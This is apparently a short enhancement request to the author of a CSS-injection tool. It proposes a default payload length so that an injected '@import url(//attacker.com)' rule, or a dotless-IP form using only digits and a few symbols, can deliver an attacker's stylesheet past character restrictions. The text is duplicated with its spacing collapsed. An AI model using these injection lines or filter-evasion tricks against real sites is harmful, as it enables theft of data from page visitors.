Hey d0nut, here's another enhancement request.
Since we're specifying charset on the command line, why not also allow specifying a default staging len value. This way if no path is specified, a targeted payload could still be delivered.
For example if we could only inject (assuming protocol relative url support):
@import url(//attacker.com)
Then a payload could be generated using whatever len argument was specified via the command line (a sensible default, like 12 could be assumed if none is provided via URL or CLI).
This would have the advantage of limiting the characters required for successful injection to only ().a-z/ . This could be reduced further to just ()0-9/ using dotless IP to just:
@import url(//16843009)
Wouldn't that be cool?
Hey d0nut, here's another enhancement request.
Since we're specifying
charseton the command line, why not also allow specifying a default staginglenvalue. This way if no path is specified, a targeted payload could still be delivered.For example if we could only inject (assuming protocol relative url support):
@import url(//attacker.com)Then a payload could be generated using whatever
lenargument was specified via the command line (a sensible default, like 12 could be assumed if none is provided via URL or CLI).This would have the advantage of limiting the characters required for successful injection to only
().a-z/. This could be reduced further to just()0-9/using dotless IP to just:@import url(//16843009)Wouldn't that be cool?